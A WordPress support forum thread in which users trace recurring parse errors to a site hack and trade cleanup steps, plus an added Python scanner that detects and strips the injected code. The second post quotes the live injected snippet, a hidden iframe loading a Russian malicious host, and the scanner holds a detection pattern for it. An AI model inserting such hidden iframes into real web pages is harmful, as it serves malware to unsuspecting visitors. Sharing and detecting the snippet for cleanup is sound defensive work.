syntax error on default-widgets.php file (10 posts)

  1. vinz77
    Member
    Posted 2 months ago #

    Hello,
    My blog keeps on crashing -by itself-, with this message:
    Parse error: syntax error, unexpected '<' in /homepages/4/d134610354/htdocs/moebius77/blog2/wp-includes/default-widgets.php on line 1034
    I can get it back up by substituting file d-w.php for the original WP 2.8 file, but after a while it crashes again; I open the file and it's incomplete.
    What is going on?
    How can I fix this?
    Thanks,
    Vinz

  2. vinz77
    Member
    Posted 2 months ago #

    Got It:
    1) Re-install all your WordPress blog, FTP it onto the server again, EXCEPT the WP-Content folder if you want to keep your images and themes.
    2) Now you should be able to login. Go to your dashboard and install plugin "Script Exploiter".
    3) Run the plugin and look for malicious script. In my case, I had this baby:
    <div style="display:none"><iframe src="http://past-another-life.ru:8080/index.php" width=571 height=464 ></iframe></div>
    copied on most of my install.php files, on all the themes (default, etc.), on the plugins and others.
    4) Download the files with the added script, open them with an editor and erase all the garbage.
    5) FTP them back on the server, you should be all right.
    Cheers, hope this helps,
    Vinz

  3. vik79
    Member
    Posted 1 month ago #

    Hi Vinz,

    I have been getting the same error for the last 3 days and been searching on Google and finally found your post. Looks like this is a relatively new problem. I am still getting the same error so I need your help!

    Just a little earlier (before finding your post) I deleted all files from my web-server and uploaded WordPress back. I was able to enter my db details and on the next step got the same error again. I followed your instruction and deleted WP-Content folder hoping this would allow me to login but I am still getting the same error?

    I am with 1and1.com shared hosting and thought that I was having problems configuring ioncube loader but looks like I gotta get rid of the malicious code first.

    Please reply back and help me

    Vik

  4. iridiax
    Member
    Posted 1 month ago #

    looks like I gotta get rid of the malicious code first.

    Yes, sudden parse errors can be a sign of hacking.

  5. moebius77
    Member
    Posted 1 month ago #

    Hello, Vik79,
    1) I lost my password so am logged in with nick.
    2) I was also with 1and1, I suspect it's a server virus script on their end: but I called and emailed them, to no avail.
    3) Here's the thing: that script is a smart little f*cker. If you leave just a string of it lying around, it'll multiply and kill your site before you know it.
    4) Actually, after I wrote this it came back up again, because it had leaked onto all the sites we host on 1and1.
    5) So: you have to be absolutely sure you've isolated it. Compare your index.php files with the clean Wordpress ones; you should be able to make out what the complete string is. Do not leave anything on there; at first, I left a <div> </div> because I thought it amounted to nothing; remember, it's a hidden string. Make sure your index' are just "<?php> silence is golden" or whatever the original WP has.
    6) You have to clean all your pages, even static non-blog pages. I found it there too. Where there's an index, there's a way he'll get on it. Actually, he didn't make my other pages crash but web navigators would flare my site for "malicious script".
    7) Get into contact with whoever shares your server and has pages on it. We had 7 or 8 sites up; had to take them all down, erase the server completely, clean every page and put it back up. Yes, it takes time. Yes, it sucks. You've been served.
    8) My "WP-Content" folder was FUCKED. Every time I reinstalled, I got all kinds of errors. So I had to go from scratch: Reinstall WP, reinstall my theme, and plugins, one by one. Don't worry, the WP database keeps track of your widgets and stuff so no major redesign is in order, but it'll take you a minute or two.
    9) Important: After you take everything off your server, change FTP access passwords. It seems the hack is coming from FTP clients (like Smart FTP) that keep passwords open and get stolen. So go to 1and1 and change that, tell whoever shares server with you to do the same, and don't click the "remember password" box on your FTP client.
    If you make sure every site on the server is clean, you change FTP passwords and upload it, technically, you should be ok. Of course, I'm no IT expert, I'm just a blogger. This site gets into the semantics of it all (and provides no solution whatsoever -gotta love 'em):
    http://blog.unmaskparasites.com/2009/09/17/quicksilver-malware-network/
    Good luck, I'll be around but again, I know very little about programming. These are just my clumsy recommendations.
    Vinz.
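
Added example (not part of the original thread): a small scanner for the hidden-iframe wrapper quoted in post 2, which reports every affected file and removes the complete wrapper, `<div>` included, as post 5 advises. The file extensions, the `injected.example` host and the sample file contents are constructed assumptions.

```python
import os
import re
import tempfile

# Hidden-div + iframe wrapper of the shape quoted in post 2 (attribute order and
# whitespace may vary between infections, so the pattern is deliberately loose).
HIDDEN_IFRAME = re.compile(
    r'<div[^>]*style\s*=\s*["\'][^"\']*display\s*:\s*none[^"\']*["\'][^>]*>\s*'
    r'<iframe[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)[^>]*>.*?</iframe>\s*</div>',
    re.IGNORECASE | re.DOTALL,
)
SCAN_EXTENSIONS = (".php", ".html", ".htm", ".js")  # assumption: adjust per site

def find_hidden_iframes(text):
    """Return [(line_number, iframe_src), ...] for every injected wrapper."""
    return [(text.count("\n", 0, m.start()) + 1, m.group(1))
            for m in HIDDEN_IFRAME.finditer(text)]

def strip_hidden_iframes(text):
    """Remove the whole wrapper, <div> included, so no fragment is left behind."""
    return HIDDEN_IFRAME.sub("", text)

def scan_tree(root):
    """Walk root and map each infected file path to its list of hits."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_hidden_iframes(fh.read())
            if hits:
                report[path] = hits
    return report

# Constructed sample: a "silence is golden" index.php with the wrapper appended.
CLEAN = "<?php\n// Silence is golden.\n"
INFECTED = CLEAN + ('<div style="display:none"><iframe src="http://injected.example'
                    ':8080/index.php" width=571 height=464 ></iframe></div>\n')

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        for name, body in (("index.php", INFECTED), ("clean.php", CLEAN)):
            with open(os.path.join(site, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        for path, hits in scan_tree(site).items():
            print(path, hits)
```

Run it against a downloaded copy of the site rather than the live server, and diff any cleaned file against the stock WordPress file before uploading it again.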

  6. vik79
    Member
    Posted 1 month ago #

    Vinz,

    I would have felt really outraged if this were to happen to my established websites. I am glad that you know what you are doing ..hopefully you will be back up and running soon.

    Luckily for me, I usually do direct linking and never had an established website of my own. I did register a few domains on 1and1 to start a couple of niche sites.

    Ok so I am going to take following steps to hopefully fix the damage:-

    1. Delete wordpress folder from my computer
    2. Delete wordpress folder from my server
    3. Erase my ftp details and change my 1and1 login information.
    4. Upload fresh copy of wordpress.
    5. Try to get the Ioncube loader going (hopefully I will get it this time)
    6. Delete all my plugins from my PC, download them fresh and upload em.

    If you think of anything else I should do pls lemme know. I am in Melbourne Australia and it's getting late up here.. so I will wait for the fresh install till tomorrow.

    Again, thx for your assistance.. knowing that there is not a lot of info about this problem you have really done a good service to whoever happens to visit this page!

    Cheers,

    Vik

  7. moebius77
    Member
    Posted 1 month ago #

    ...As per my experience, that should work...
    Too bad the real experts that hang around this site and others can't have a professional say on the thing...
    P.S.: Make SURE you make a backup of your MySQL tables somewhere in between. The script doesn't seem to affect your tables but just in case, hang onto those because that's where all your blog info is.
    You'll find those in your PHP section of my 1and1.
    That said, that's the limit of my blog knowledge. I really hope it works and am crossing me's fingers for you...
    Don't worry, you'll be celebrating over a Foster's in no time!
    Peace,
    V.

  8. covellz
    Member
    Posted 1 month ago #

    Hello group! I have spent 30 hours over the last 3 1/2 days getting my wordpress blog up at http://zackcovell.com

    My problem is that for the 3rd day in a row I get the following error after I leave the site for a little bit and then come back.

    Parse error: syntax error, unexpected '<' in /homepages/10/d232920448/htdocs/wp-includes/default-widgets.php on line 1034

    I seriously need some help identifying what the heck is wrong with the script or something else.

    Please DO NOT tell me to start over, I've read this forum already twice and have crashed my blog through some unknown method twice.

    Thanks and call if you'd like to offer some assistance. Zack 503-325-2858

  9. whooami
    Member
    Posted 1 month ago #

    I emailed you zack -- I'm not up to phone calls this early. :)

  10. vik79
    Member
    Posted 1 month ago #

    Hello it's Vik79 checking in..

    I posted a couple of days ago, about the problem with WordPress installation. I followed exactly what I wrote above and it worked!

    Had to completely wipe off everything related to wordpress and plugins from my computer and the server to be 100% sure that no trace of the malicious code is left. Then re-uploaded everything back. I even figured out the ioncube loader install on 1and1.

    Fingers crossed everything looks good now.

    I would like to mention here that this was a new domain, so I didn't have to backup or do any of the extra effort so what I have done may not be relevant to existing sites with content.

    Thanks to Vinz/moebius77 for assistance.

    Good luck to you all!

    Peace to you and yours,

    Vik
